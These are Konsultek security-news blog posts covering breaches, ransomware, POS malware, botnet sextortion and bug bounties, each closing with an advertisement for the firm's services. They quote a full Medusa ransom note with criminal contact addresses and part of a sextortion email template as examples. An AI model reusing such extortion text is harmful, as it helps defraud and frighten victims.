Ethical Hackers Converge on U.S. Army

Between October 9 and November 15 the U.S. Army was hacked by 52 different hackers. While without further context that sounds bad for the health of our Nation’s armed services these particular hacks were part of the second “Hack the Army” event.

According to the Army’s press release, last year’s bug bounty challenge included more than 60 publicly accessible web assets. The purpose of the program was to “enhance the safety and security of these systems through crowdsourced security testing by an army of ethical hackers.”

It is our Duty

“It is our duty to ensure our citizens are protected from cyber threats, and finding new and innovative ways to do so is vital,” said Alex Romero, Digital Service Expert at Department of Defense Digital Service. “Our adversaries are determined and creative, so we must be every bit more of both. This latest HackerOne Challenge allows us to continue to harden the Army’s attack surfaces with the talent and diverse perspectives of HackerOne’s vetted hacker community.”

146 Vulnerabilities Found

The 5-week challenge drew hackers from the U.S., Canada, Germany, Portugal, Netherlands and Romania. In that short, intense time period 146 vulnerabilities were found and $275,000 in bounties paid.

Satisfying and Rewarding for All

On November 20, the challenge culminated in an awards ceremony in Augusta, Georgia where the top three hackers — @alyssa_herrera@erbbysam, and @cdl — were rewarded for their contributions.

“The Department of Defense programs are some of my favorites to hack on, and Hack the Army 2.0 was one of the most rewarding,” said second place winner @alyssa_herrera. “It is so exciting to know that the vulnerabilities I find go towards strengthening Army defenses to protect millions of people. Coming in second place and being invited to spend time with the hackers and soldiers I worked alongside made the impact we made in this Challenge feel even bigger.”

Discover Your Vulnerabilities for FREE

You don’t have to be the Department of Defense and pay hundreds of thousands in bug bounties to take advantage of the power of ethical hacking and penetration testing.

Our team of experts is happy to provide an outside, independent and unbiased analysis of your network’s security. Simply give us a call or click here: https://konsultek.com/executive-risk-assessment/.

You’ll receive a complimentary Executive Risk Assessment. This assessment will not only show you the risk and impact to your most critical digital assets but demonstrate the likelihood of a breach happening.

So whether it is a wide open IP Address, ransomware, brute force hacking, phishing or some other cyber threat, Konsultek has the tools and talent to develop the right security solution for your particular situation.

A Billion Sensitive Medical Images are Available to Anyone on the Web

If you are like most people you’ve had at least one ridiculous run-in with the HIPAA laws. Most often it happens when you are trying to get medical results on behalf of another family member and you are denied because HIPAA is protecting his or her privacy!

And Yet ANYONE Can Download Their Images!

According to TechCrunch, over a billion medical images ranging from X-rays to ultrasounds and CT scans are available for download by anyone with an Internet connection and free-to-download software.

Makes one wonder where is HIPAA on this one?

Outdated and Insecure

The problem stems from insecure storage systems that are being used by hospitals, medical imaging centers and medical offices. These archiving systems known as PACS servers (Picture Archiving and Communication Systems) have had known vulnerabilities for quite some time. These PACS run a network architecture called DICOM (Digital Imaging and Communications in Medicine) that allows the archived images to be exchanged amongst servers and thus among the various healthcare providers that need access to them in order to provide patient care. Unfortunately, DICOM uses the IP protocol and this means that these systems can also be found on the Internet.

The HIPAA website states:

“The HIPAA Privacy regulations require health care providers and organizations, as well as their business associates, to develop and follow procedures that ensure the confidentiality and security of protected health information (PHI) when it is transferred, received, handled, or shared.  This applies to all forms of PHI, including paper, oral, and electronic, etc.  Furthermore, only the minimum health information necessary to conduct business is to be used or shared.”

Open to Anyone Who Wants a Peek. Not Exactly HiPAA Compliant!

Since PACS servers store highly confidential data pertaining to the medical records of individuals, access should be heavily restricted per the HIPAA laws so that only certain personnel can view it. However, according to the results of a study conducted by Greenbone “for many of the archiving systems nothing could be further for the truth. Anyone can access a significant number of these systems and, what’s more, they can see everything that’s stored on them.” And by everything, we mean everything. Greenbone found that these wide-open archives contained medical and personal information including Social Security Numbers, birth dates, procedure dates, exam details, treating physicians, clinics and the scans themselves. All searchable and in some cases downloadable.

Let Konsultek Check Your Network for Vulnerabilities

Whether it is a wide open IP Address, ransomware, brute force hacking, phishing or some other cyber threat, Konsultek has the tools and talent to develop the right security solution for your particular situation.  Not sure just how robust your network security is? No problem! Let our experts check your network’s vulnerability for free.

Our team of experts is happy to provide an outside, independent and unbiased analysis of your network’s security. Simply give us a call or click here: https://konsultek.com/executive-risk-assessment/.

You’ll receive a complimentary Executive Risk Assessment. This assessment will not only show you the risk and impact to your most critical digital assets but demonstrate the likelihood of a breach happening.

Gas Card POS Malware Plays Grinch Over Holiday Season

Visa has issued consecutive monthly security alerts regarding fuel dispenser merchant POS systems. In November Visa stated :

In August and September 2019, Visa Payment Fraud Disruption (PFD) investigated two separate breaches at North American fuel dispenser merchants. The attacks involved the use of point-of-sale (POS) malware to harvest payment card data from fuel dispenser merchant POS systems. It is important to note that this attack vector differs significantly from skimming at fuel pumps, as the targeting of POS systems requires the threat actors to access the merchant’s internal network.

In December, Visa followed up with a second security alert that stated:

These merchants are an increasingly attractive target for cybercrime groups. Track 1 and track 2 payment card data was at risk in the merchant’s POS environments due to the lack of secure acceptance technology,(e.g. EMV® Chip, Point-to-Point Encryption, Tokenization, etc.) and non-compliance with PCI DSS.

This is Not Skimming

While most POS compromises in years gone by have involved the use of skimmers, these latest threats are taking place at the network level.

Threat #1: In the first incident identified by Visa’s Payment Fraud Disruption (PFD) group the attackers gained access to the merchant network through the old tried and true phishing email. A malicious link in that email installed a Remote Access Trojan that provided network access. Once in, they moved through the network and accessed the POS Environment ultimately installing a RAM scraper to harvest payment card data

Threat#2: In the second incident, it is unclear how the attackers gained network access but once in they followed a route similar to Threat #1, installed a RAM scraper and harvested payment card data. Forensic analysis of the compromise points to the cybercrime group FIN8 as being the most likely culprit.

Threat#3: The third attack has also been attributed to FIN8 and used a previously seen malware of their creation combined with a new, previously unseen shellcode backdoor malware.

More Technically Advanced

Visa’s PFD group’s analysis concludes that a more sophisticated level of cybercriminals has set its sights on fuel dispenser merchants. Apparently these criminals, while late in the fuel pump game, are happy to exploit this opportunity while it lasts. Come October 2020 all fuel dispenser merchants will be required to have chip compatible card readers installed on their pumps and this will ostensibly eliminate the threat of RAM scraping because the data will be encrypted.

Konsultek Knows Security

At Konsultek we create customized security solutions that utilize the most advanced prevention, detection and response technologies available. This holistic approach to security can help your organization stay ahead of cybercriminals and hackers who manage to penetrate your system defenses through social engineering means such as the phishing emails that compromised the fuel merchant described in Threat#1. Want to learn more? Give us a call and let’s discuss your specific situation and how we might be of service.

Milwaukee Nursing Home IT Outsourcer Crippled by Ransomware

Virtual Care Provider Inc. (VCPI) a Milwaukee-based company that provides technology services to more than 100 nursing homes across the country has been hit by Russian hackers who are still holding data from the nursing homes hostage.

A Terrible $14MM Miscalculation

As we have reported many times on this blog through the years, government and healthcare organizations are top targets for hackers who believe that these organizations live in a “must pay” world. The problem with this particular attack is that VCPI was perceived by the Russian hackers as being much larger and financially stout than it actually is. As it turns out, there is no way that they can pay the $14MM ransom, even if they wanted to. This obviously is a problem for the hackers and the nursing homes alike.

Do As I Say Not as I Do

In a display of irony that would make O’Henry proud VCPI, which provides internet security and data storage services to nursing homes and acute-care facilities, has a blog post on its site that provides guidance as to how not to fall victim to email phishing attacks! The very same type of attack that led to the ransomware attack!

It’s Not Too Late Till It’s Too Late

According to information shared with Krebsonsecurity.com, by security expert Alex Holden the attack took place over a period of 14 months and up until the final 3 days the catastrophe could have been avoided.

“While it is clear that the initial breach occurred 14 months ago, the escalation of the compromise didn’t start until around November 15th of this year,” Holden said. “When we looked at this in retrospect, during these three days the cybercriminals slowly compromised the entire network, disabling antivirus, running customized scripts, and deploying ransomware. They didn’t even succeed at first, but they kept trying.” –Alex Holden

Prevention, Detection and Response

At Konsultek we create customized security solutions that utilize the most advanced prevention, detection and response technologies available. This holistic approach to security can help your organization stay ahead of cybercriminals and hackers who manage to penetrate your system defenses through social engineering means such as the phishing emails that compromised VCPI. Want to learn more? Give us a call and let’s discuss your specific situation and how we might be of service.

 

Macy’s Stock Drops 10% When Second Data Breach Reported

It may well be the holiday season and a time for cheer and goodwill to all but investors were not happy at all when on Tuesday 11/19/19 Macy’s reported that they experienced another data breach in October.

Not Many Details Yet

Since the breach is so fresh there aren’t many details yet. Here is what Macy’s has reported so far:

Macys.com experienced a breach between October 7 and October 15 of this year.

  • Malicious code was inserted into its website
  • An unknown number of customer’s information was stolen
  • That customer information included:
    • Names
    • Addresses
    • Phone numbers
    • Credit card numbers
    • Credit card verification codes
    • Credit card expiration dates.

Magecart Again?

While the exact identity of the hacker is unknown at this point, some are already speculating that Magecart the hacking/skimming group behind the British Airways, TicketMaster UK, NewEgg and Forbes hacks might well be behind the Macy’s attack.

How Vulnerable is Your Network?

Whether your organization handles the data for 30 or 30 million people, Konsultek will help keep your network safe and your data secure.

If you are unclear as to whether or not your security is up to the challenges of today’s hackers, we can help you find out.

Our team of experts is happy to provide an outside, independent and unbiased analysis of your network’s security. Simply give us a call or click here: https://konsultek.com/executive-risk-assessment/.

You’ll receive a complimentary Executive Risk Assessment. This assessment will not only show you the risk and impact to your most critical digital assets but also demonstrate the likelihood of a breach occurring.

Laser Pointers Can Hack Virtual Assistants from Long Distances

Bored with taunting your cat with your laser pointer? Why not try taunting your neighbor instead by hijacking his virtual assistant?!

While we all know that virtual assistants such as Amazon’s Echo and Google’s Home by their very design, respond to sound commands, what researchers at University of Michigan and University of Electro-Communications, Tokyo have discovered takes things to a whole new level of the electromagnetic spectrum!

Reach Out and Hack Someone

Using nothing more than a simple laser pointer these researchers of arcane vulnerabilities were able to demonstrate that they could take over 13 different voice activated devices at distances up to 110 meters. The only limitations to the long-distance hack are the intensity of the beam and of course your sniping skills. Using a higher powered laser the researchers were successful at eliciting similar responses on phones and tablets.

<iframe width=”512″ height=”288″ src=”https://www.youtube.com/embed/ORji7Tz5GiI” frameborder=”0″ allow=”accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture” allowfullscreen></iframe>

Impact of Vulnerability Depends on Assistant’s Use

If you are like many and use your smart assistant for nothing more than listening to the radio or asking about the weather then the impact of a hack would be minimal. However, if you are smart home aficionado your home’s security, shopping accounts and possibly even your credit cards and connected medical devices could be at risk from this vulnerability. Moving beyond assistants, phones and tablets, the researchers were able to demonstrate similar light based vulnerabilities in certain Ford and Tesla automobiles

IoT is Like the Wild West

Through the years we have documented vulnerabilities in all sorts of IoT devices from printers and refrigerators to automobiles and medical devices. The simple fact is device providers are far more interested in bringing new “wow” features to their products than they are building devices with robust security features.  That’s why you need a security partner like Konsultek. Our team of experts has the capabilities to identify vulnerabilities in your network and in the devices that connect to your network and then develop a customized security solution that keeps your organization safe from threats.

Medusa Ransomware Turns Your Files to Stone

Ok. The Medusa Ransomware doesn’t REALLY turn your files to stone, but it makes them just as useless and inaccessible. This latest ransomware burst on the scene in late September and according to Bleeping Computer it appears to be getting distributed worldwide with victims scattered around the globe. Researchers have not yet identified just how Medusa is being spread though we can surmise it is through the usual channels such as phishing, downloads and watering holes.

Just Getting Started

Only time will tell just how big and ugly Medusa will get but submissions to ID Ransomware have been streaming in.

Despite the steady stream of victims reporting in, Medusa is so new very little is known about how it is being spread and even whether or not if you pay the requested ransom you will receive a decryption key!

According to the ransom note generated by Medusa you can email them one of your encrypted files and they will decrypt it for free to prove that they can indeed unlock your files before you send them payment. Speaking of payment, at this time it is not clear from the ransom note posted on Bleeping Computer (shown below) exactly how much you need to send! Perhaps these guys should get some third party help with their ransom demands?

All your data are encrypted!

What happened?

Your files are encrypted, and currently unavailable.

You can check it: all files on you computer has new expansion.

By the way, everything is possible to recover (restore), but you need to buy a unique decryptor.

Otherwise, you never cant return your data.

For purchasing a decryptor contact us by email:

sambolero@tutanoa.com

If you will get no answer within 24 hours contact us by our alternate emails:

rightcheck@cock.li

What guarantees?

Its just a business. If we do not do our work and liabilities – nobody will not cooperate with us.

To verify the possibility of the recovery of your files we can decrypted 1 file for free.

Attach 1 file to the letter (no more than 10Mb). Indicate your personal ID on the letter:

[id]

 

Attention!

– Attempts of change files by yourself will result in a loose of data.

– Our e-mail can be blocked over time. Write now, loss of contact with us will result in a loose of data.

– Use any third party software for restoring your data or antivirus solutions will result in a loose of data.

– Decryptors of other users are unique and will not fit your files and use of those will result in a loose of data.

– If you will not cooperate with our service – for us, its does not matter. But you will lose your time and data, cause just we have the private key.

Security Expertise You Can Count On

Whether it is ransomware, brute force hacking, phishing or some other cyber threat, Konsultek has the tools and talent to develop the right security solution for your particular situation.  Not sure just how robust your network security is? No problem! Let our experts check your network’s vulnerability for free.

Our team of experts is happy to provide an outside, independent and unbiased analysis of your network’s security. Simply give us a call or click here: https://konsultek.com/executive-risk-assessment/.

You’ll receive a complimentary Executive Risk Assessment. This assessment will not only show you the risk and impact to your most critical digital assets but demonstrate the likelihood of a breach happening.

Phorpiex Botnet Reinvents Itself as Sextortion Email Distributor

The Phorpiex (aka Trik) botnet has been active for nearly a decade and operates more than 500,000 infected hosts. And, according to research just released by Check Point it has recently morphed itself to generate income in a whole new way – by running large scale “sextortion” email campaigns.

Image Courtesy of Check Point Research

Evolve or Die

In the past, Phorpiex was monetized primarily by distributing other malware including GandCrab, Pony, Pushdo, and by siphoning off its host’s computing power to mine cryptocurrency. Recently, like any virus, Phorpiex evolved again by adding sextortion emails as its latest form of revenue generation.

Extortion Email on the Rise

In 2018 the FBI’s Internet Crime Complaint Center registered a 248% increase in extortion email activity. The majority of that email? Sextortion, of course! And why not? Once you have the assets in place such as an underutilized botnet, a high volume sextortion email campaign can generate a healthy passive income 24X7X365.

Leveraging a Cheap Commodity for a Novel Use

One of the more clever aspects of the sextortion scam is the use of real passwords to bolster the veracity of the email’s claims, thereby increasing the compliance rate of the victims.

Leaked credential lists that contain passwords that don’t necessarily match the associated email are very inexpensive on the black market. That’s because the combination of the two won’t give you access to a real email. However, when used as a way to scare a sextortion victim into believing you really have incriminating video or pictures of them doing something naughty, they can be pretty convincing as the income numbers show.

Here is how this inexpensive data is used in the email:

From: Save Yourself
Subject: I recorded you – ██████

Hi, I know one of your passwords is: ██████

Your computer was infected with my private malware, your browser wasn’t updated / patched, in such case it’s enough to just visit some website where my iframe is placed to get automatically infected, if you want to find out more – Google: “Drive-by exploit”.
My malware gave me full access to all your accounts (see password above), full control over your computer and it also was possible to spy on you over your webcam.

The email goes on but it is that initial “proof” that is being bought in huge quantities for very little money that makes the campaign work so well.

$22,000 a Month from 30,000 Emails an Hour

Check Point researchers have monitored the activities of the Phorpiex campaign for 5 months and during that time the campaign wallets have taken in more than 14 Bitcoins equating to a respectable $22,000 per month. Not bad for an auto-pilot business that leverages its 500,000 zombie computers to send out up to 30,000 emails an hour.

Extortion, Malware, Phishing we’ve Seen it All

At Konsultek we specialize in giving our customers peace of mind through customized security solutions that utilize the most advanced prevention, detection and response technologies available.

Have manpower or talent issues? Our managed security suite allows organizations to gain access to superb security engineers as needed without the expense and hassle of recruiting and hiring staff. Call us today to learn about how your organization’s future can become more secure.

Yahoo Announces Class Action Settlement for Data Breach

Following on the heels of Equifax settlement in July, 2019, Yahoo has announced that it will settle class action litigation against it for its series of massive data breaches.

In case you can’t quite remember all that went wrong with Yahoo in regards to breaches, here is a quick recap from their press release:

  1. 2012 Data Security Intrusions: From at least January through April 2012, at least two different malicious actors accessed Yahoo’s internal systems. The available evidence, however, does not reveal that user credentials, email accounts, or the contents of emails were taken out of Yahoo’s systems.
  2. 2013 Data Breach: In August 2013, malicious actors were able to gain access to Yahoo’s user database and took records for all existing Yahoo accounts—approximately three billion accounts worldwide. The records taken included the names, email addresses, telephone numbers, birth dates, passwords, and security questions and answers of Yahoo account holders. As a result, the actors may have also gained access to the contents of breached Yahoo accounts and, thus, any private information contained within users’ emails, calendars, and contacts.
  3. 2014 Data Breach: In November 2014, malicious actors were able to gain access to Yahoo’s user database and take records of approximately 500 million user accounts worldwide. The records taken included the names, email addresses, telephone numbers, birth dates, passwords, and security questions and answers of Yahoo account holders, and, as a result, the actors may have also gained access to the contents of breached Yahoo accounts, and thus, any private information contained within users’ emails, calendars, and contacts.
  4. 2015 and 2016 Data Breach: From 2015 to September 2016, malicious actors were able to use cookies instead of a password to gain access into approximately 32 million Yahoo email accounts.

Do You Qualify for Compensation?

If you received a notice from Yahoo about the data breaches, or if you had a Yahoo account at any time between January 1, 2012 and December 31, 2016, and are a resident of the United States or Israel, you are a “Settlement Class Member.”

Under the terms of the Settlement, Yahoo has created a Settlement Fund of $117,500,000 and will provide victims a minimum of two years of Credit Monitoring Services to protect Settlement Class Members from future harm, or an alternative cash payment for those who verify they already have credit monitoring or identity protection.

If you can prove that you’ve had out-of-pocket losses, including but not limited to loss of time dealing with the breach you may qualify for additional compensation.

The complete list of all available legal rights and options can be found here.

Prevention is the Better Option

At Konsultek we firmly believe that an ounce of prevention is worth a pound of cure. The negative impact a breach can have on your brand is far greater than any fine or lawsuit that could potentially be levied against you. That is why we specialize in developing custom security solutions that utilize the most advanced prevention, detection and response technologies available.

Have manpower or talent issues? Our managed security suite allows organizations to gain access to superb security engineers as needed without the expense and hassle of recruiting and hiring staff. Call us today to learn about how your organization’s future can become more secure.

Entire Population of Ecuador’s Data Leaked

While in sheer numbers the Ecuadorian leak is far smaller than many corporate breaches in the US, the Ecuador government is taking the breach far more seriously than the US government ever has or probably ever will take a security breach and is meting out justice swiftly and decisively.

According to a post on vpnmentor.com more than 20 million people, including 7 million minors, had their most sensitive data leaked including the Ecuadorian equivalent of social security numbers, tax payer ID numbers and a host of other information including:

  • full name (first, middle, last)
  • gender
  • date of birth
  • place of birth
  • home address
  • email address
  • home, work, and cell phone numbers
  • marital status
  • date of marriage (if applicable)
  • date of death (if applicable)
  • level of education.

Image Source: CNN.com

A Significant Breach Deserves Significant Consequences

At least that is how the Ecuadorian Government feels. According to an article on CNN the Ecuadorian’s take their breaches a little more seriously than we do here in the States.

“On Monday, prosecutors and a federal police force raided the home of Novaestrat’s legal representative, William Roberto G., seizing electronic equipment and computers. Later that evening, the police found and detained him in Ecuador’s northwestern Esmeraldas province.

“He will be transferred immediately so that the Ecuador prosecutor can gather information in the framework of the investigation that is taking place,” tweeted Interior Minister Maria Paula Romo.

“If it’s confirmed that they violated the personal privacy of Ecuadorians, it is a criminal offense that must be punished,” said Telecommunications Minister Andres Michelena on Twitter.”

Imagine if the CEOs of Target, HomeDepot and Equifax were dragged out of their homes in response to their breaches! That might get the always challenged CISO budget enhanced and approved!

Konsultek Takes Security Seriously Too

Whether your organization handles the data for 30 or 30 million people, Konsultek will help keep your network safe and your data secure.

If you are unclear as to whether or not your security is up to the challenges of today’s hackers, we can help you find out.

Our team of experts is happy to provide an outside, independent and unbiased analysis of your network’s security. Simply give us a call or click here: https://konsultek.com/executive-risk-assessment/.

You’ll receive a complimentary Executive Risk Assessment. This assessment will not only show you the risk and impact to your most critical digital assets but also demonstrate the likelihood of a breach occurring.

© Copyright 2018 Konsultek